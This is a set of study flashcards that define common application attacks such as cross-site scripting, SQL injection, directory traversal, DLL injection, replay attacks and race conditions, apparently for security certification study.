Application Attacks Flashcards
_____ is a malicious script hosted on the attacker’s site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site.
Cross-site scripting (XSS)
_____ is a malicious script hosted on the attacker’s site that can exploit a session started on another site in the same browser.
Cross-site Request Forgery (XSRF)
An _____ attack inserts an SQL query as part of user input, which allows an attacker to extract or insert information into the database or execute arbitrary code.
SQL injection
A _____ attack runs OS shell commands from the browser and allows commands to operate outside of the server’s directory root, allowing commands to run as the web “guest” user.
command injection
_____ occurs when the attacker gets access to a file outside the web server’s root directory.
Directory traversal
_____ describes the problem of authorizing a request for a service that depends on an intermediate service.
Transitive access
A lightweight directory access protocol (LDAP) injection occurs when an attacker exploits a client’s unauthenticated access to submit LDAP queries that could create or delete accounts, even change authorizations and privileges. LDAP uses port 389.
Study
A _____ injection is a vulnerability that causes the operating system to allow one process to attach to another.
dynamic link library (DLL)
_____ means the code performs the same function by using different methods. _____ means that the antivirus software may no longer identify the malware by its signature.
Refactoring
_____ is the process of developing and implementing additional code between an application and the operating system to enable functionality that would otherwise be unavailable.
Shimming
A ______ is a malicious script hosted on the attacker’s site that can exploit a session started on another site in the same browser. This is successful if the server does not check if the user actually made the request.
Cross-site Request Forgery (XSRF)
_____ is a server-side input validation exploit that injects a script into a website. Once the victim visits the infected website, the malicious code executes in the user’s browser.
Reflected Cross-Site Scripting (XSS)
_____ is a server-side script attack that inserts code into a back-end database used by the trusted site
Stored (or persistent) Cross-Site Scripting (XSS)
_____ Cross-Site Scripting (XSS) exploits vulnerabilities in client-side scripts to modify the content and layout of a web page.
Document Object Model (DOM)
What can happen if program developers do not use logic statement tests before trying to use the software?
A malicious process can alter the execution environment to create a null point and crash the program
A _____ consists of intercepting a key or password hash, then reusing it to gain access to a resource. Using once-only session tokens or timestamping sessions prevents this type of attack.
replay attack
_____ occurs when the attacker inserts an invisible layer into a trusted web page that can intercept or redirect input without the user realizing it.
Clickjacking
An ______ occurs when an attacker takes advantage of unsecure communication with application services to perform denial of service attacks
application programming interface (API) intrusion
A _____ is a code library that intercepts and redirects calls to enable legacy mode on a system.
shim
A _____ is a reference to an object in memory. Attempting to access that memory address is called dereferencing. An integer is a positive or negative whole number.
pointer
An _____ attack causes the target software to calculate a value that exceeds the upper and lower bounds.
integer overflow
A _____ is a software vulnerability that occurs when the execution processes are dependent on the timing of certain events, and those events fail to execute in the order and timing intended.
race condition
